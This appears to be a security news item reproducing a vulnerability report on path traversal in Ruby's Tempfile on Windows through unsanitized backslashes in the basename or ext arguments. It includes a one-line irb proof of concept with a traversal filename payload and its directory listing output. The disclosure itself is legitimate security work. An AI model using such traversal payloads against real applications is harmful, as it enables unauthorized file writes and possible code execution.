๐ Ruby: Path traversal in Tempfile on windows OS due to unsanitized backslashes
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Hi team, Summary We've noticed that both arguments (basename and ext) of Tempfile on Windows are vulnerable to a path traversal which could allow unintentional file creating in arbitrary writable directories. Tempfile often has a user control either by basename or ext (or both). PoC ~~~ irb(main):029:0> Tempfile.open(["\..\..\..\..\..\Users\rootx\malicious",".rb"]) => # irb(main):030:0> puts dir C:\\Users\\rootx\\ Volume in drive C has no label. Volume Serial Number is C0F2-8D87 Directory of C:\Users\rootx ... REDACTED ... 21-03-2021 00:45 0 malicious20210321-22472-fvuodx.rb ... REDACTED ... ~~~ The same can be accomplished via ext argument. Thanks, Harsh and Rahul, HTTPVoid Impact Unintentional file creation in an arbitrary directory. Could potentially cause RCE in RoR... ...